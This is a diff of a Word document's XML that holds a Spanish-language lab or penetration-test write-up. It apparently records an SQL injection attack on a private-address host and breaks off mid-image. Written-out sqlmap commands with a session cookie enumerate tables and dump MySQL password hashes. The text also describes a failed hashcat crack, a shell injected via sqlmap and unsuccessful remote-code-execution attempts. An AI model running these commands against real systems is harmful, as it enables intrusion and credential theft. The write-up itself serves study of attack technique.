+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>  Time</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>: Usa retrasos temporales para deducir si la inyección es exitosa.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Union</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>: Usa la cláusula UNION para combinar resultados de múltiples consultas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -3250,23 +3781,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>  Union-Based: Usa la cláusula UNION para combinar resultados de múltiples consultas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t xml:space="preserve">Por todo lo anterior se procede a </w:t>
       </w:r>
       <w:r>
@@ -3354,7 +3868,140 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>└─$ sqlmap -u "http://10.0.2.21/admin/edit.php?id=1" --cookie="PHPSESSID=c0kop54hhjbt1dstsr2pfpab07" --sql-query="SELECT table_name FROM information_schema.tables WHERE table_schema = 'blog';" --threads=5 --no-cast</w:t>
+        <w:t>└─$ sqlmap -u "http://10.0.2.21/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>edit.php?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>=1" --cookie="PHPSESSID=c0kop54hhjbt1dstsr2pfpab07" --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-query="SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>information_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>schema.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>table_schema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 'blog';" --threads=5 --no-cast</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3379,9 +4026,9 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="228C7018" wp14:editId="118DAB8C">
-            <wp:extent cx="5372059" cy="6787098"/>
-            <wp:effectExtent l="0" t="0" r="635" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="228C7018" wp14:editId="2C00D549">
+            <wp:extent cx="5371465" cy="7251633"/>
+            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
             <wp:docPr id="200327926" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -3394,7 +4041,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3402,7 +4049,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5385777" cy="6804429"/>
+                      <a:ext cx="5389483" cy="7275958"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -3419,84 +4066,178 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">9.- Aprovechando la vulnerabilidad de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>edit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sqli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, se intenta conseguir la contraseña del servidor </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">9.- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Aprovechando la vulnerabilidad de e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>dit de sqli, se intenta conseguir la contraseña del servidor mysql</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sqlmap -u "http://10.0.2.21/admin/edit.php?id=1" --cookie=PHPSESSID="c0kop54hhjbt1dstsr2pfpab07" --dbms=mysql </w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sqlmap -u "http://10.0.2.21/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>edit.php?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=1" --cookie=PHPSESSID="c0kop54hhjbt1dstsr2pfpab07" --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>dbms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3508,6 +4249,7 @@
         </w:rPr>
         <w:t>–</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3518,6 +4260,7 @@
         </w:rPr>
         <w:t>passwords</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3539,9 +4282,9 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF3A68C" wp14:editId="275062E1">
-            <wp:extent cx="5400040" cy="5207679"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF3A68C" wp14:editId="31F22ED2">
+            <wp:extent cx="5399375" cy="3574473"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
             <wp:docPr id="1175568806" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -3554,7 +4297,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3562,7 +4305,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5403190" cy="5210717"/>
+                      <a:ext cx="5418739" cy="3587292"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -3594,11 +4337,10 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="512F9CAF" wp14:editId="1EC42D2C">
-            <wp:extent cx="5400040" cy="5765165"/>
-            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="512F9CAF" wp14:editId="1E0A7147">
+            <wp:extent cx="5398991" cy="3657600"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="758566334" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -3611,7 +4353,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3619,7 +4361,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="5765165"/>
+                      <a:ext cx="5448046" cy="3690833"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -3646,23 +4388,40 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Se intenta hashear </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>el</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hash de la contraseña con hashcat con resultado negativo</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Se </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">consigue el hash de la contraseña, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>intent</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ándose</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hashear con hashcat con resultado negativo</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3693,15 +4452,56 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>10.- Se inyecta una Shell directamente en el sistema</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, mediante sqlmap, dando los permisos necesarios:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D613915" wp14:editId="251F6563">
-            <wp:extent cx="5400040" cy="4197350"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1452028359" name="Imagen 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59A035A2" wp14:editId="4C8C126F">
+            <wp:extent cx="5400040" cy="2676525"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="952603238" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3709,11 +4509,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1452028359" name=""/>
+                    <pic:cNvPr id="952603238" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3721,7 +4521,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="4197350"/>
+                      <a:ext cx="5400040" cy="2676525"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -3733,6 +4533,1096 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Se intentan varios métodos para ejecutar el RCE con resultado infructuoso:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1.- Intento ejecutar la Shell mediante curl o directamente en el navegado</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> con resultado negativo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A0FA251" wp14:editId="034206D8">
+            <wp:extent cx="5400040" cy="2645403"/>
